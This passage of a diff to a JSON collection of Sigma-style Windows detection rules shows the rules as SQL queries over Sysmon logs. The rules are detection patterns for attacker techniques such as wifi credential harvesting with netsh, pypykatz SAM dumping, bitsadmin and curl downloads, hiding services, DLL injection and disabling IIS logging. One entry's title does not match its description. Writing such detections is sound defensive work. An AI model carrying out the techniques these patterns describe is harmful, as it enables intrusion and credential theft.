"SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", "status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Command lines that use the same flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "SC.EXE Query Execution", - "id": "57712d7a-679c-4a41-a913-87e7175ae429", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "status": "experimental", - "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1007" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate query of a service by an administrator to get more information such as the state or PID", - "Keybase process \"kbfsdokan.exe\" query the dokan1 service with the following commandline \"sc query dokan1\"" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND OriginalFileName LIKE '%sc.exe' ESCAPE '\\' AND CommandLine LIKE '% query%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_query.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Conhost Parent Process Executions", - "id": "7dc2dedd-7603-461a-bc13-15803d132355", - "status": "experimental", - "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", - "author": "omkar72", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", + "status": "stable", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.t1203", + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND Image LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_conhost_susp_child_process.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "status": "experimental", + "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ], + "falsepositives": [ + "Other programs that cause these patterns (please report)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + }, + { + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1574.008" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": "proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "Windows Defender Definition Files Removed", - "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", - "author": "frack113", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% -All%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "Use of Scriptrunner.exe", - "id": "64760eef-87f7-4ed3-93fd-655668ea9420", + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", "status": "experimental", - "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_susp_download_office_domain.yml" + }, + { + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Legitimate use when App-v is deployed" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_scriptrunner.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ + "attack.command_and_control", + "attack.t1105", "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.t1564.004" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Service StartupType Change Via Sc.EXE", - "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", - "status": "experimental", - "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "status": "test", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_disable_service.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Suspicious Use of PsLogList", - "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", - "status": "experimental", - "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", + "id": "42b1a5b8-353f-4f10-b256-39de4467faff", + "status": "test", + "description": "Detect the harvesting of wifi credentials using netsh.exe", + "author": "Andreas Hunkeler (@Karneades), oscd.community", "tags": [ "attack.discovery", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002" + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Another tool that uses the command line switches of PsLogList", - "Legitimate use of PsLogList by an administrator" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psloglist.exe' OR (Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psloglist.yml" + "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": "test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_hktl_pypykatz.yml" + }, + { + "title": "Read Contents From Stdin Via Cmd.EXE", + "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_cmd_stdin_redirect.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "status": "experimental", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", - "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "status": "experimental", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" + "attack.execution" ], "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE 